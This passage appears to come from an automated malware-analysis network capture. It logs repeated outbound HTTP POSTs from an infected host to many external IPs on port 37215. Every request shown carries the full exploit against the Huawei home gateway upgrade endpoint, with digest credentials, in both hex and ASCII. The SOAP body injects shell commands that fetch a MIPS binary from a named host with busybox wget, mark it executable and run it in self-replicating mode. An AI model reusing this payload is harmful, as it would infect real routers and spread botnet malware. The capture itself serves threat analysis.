                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1451192.168.2.2334240197.74.81.8037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537220955 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1452192.168.2.2352988197.251.140.7037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537236929 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1453192.168.2.234195041.117.26.7537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537244081 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1454192.168.2.234992641.105.191.25037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537245989 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1455192.168.2.235983841.195.208.4037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537259102 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1456192.168.2.233734041.214.44.16837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537264109 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1457192.168.2.2354224157.133.170.10437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537269115 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1458192.168.2.2337686197.28.182.8237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537271976 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1459192.168.2.2334372157.229.193.14937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537472010 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1460192.168.2.2350846157.146.216.237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537472963 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
